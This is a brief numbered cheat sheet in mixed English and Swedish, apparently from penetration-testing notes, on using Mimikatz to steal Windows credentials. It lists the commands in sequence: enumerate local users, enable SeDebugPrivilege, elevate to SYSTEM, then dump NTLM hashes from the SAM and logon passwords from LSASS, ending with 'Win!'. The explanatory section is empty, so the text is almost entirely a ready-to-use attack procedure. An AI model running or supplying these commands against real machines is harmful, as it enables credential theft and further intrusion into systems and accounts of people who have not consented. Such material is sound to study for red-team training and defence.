5. Mimikatz

Understanding NTLM and Mimikatz:


Mimikatz Usage:

  1. Enumerate local users:
Get-LocalUser
  1. Start Mimikatz as at least Administrator:
.\mimikatz.exe
  1. Aktivera SeDebugPrivilege:
privilege::debug
  1. Elevera till SYSTEM:
token::elevate
  1. Kör arbiträrt kommando. Exempel:
lsadump::sam #Dumpar NTLM hashar från SAM.
sekurlsa::logonpasswords #Dumpar alla logon credentials som kan hittas (lsass).
  1. Win!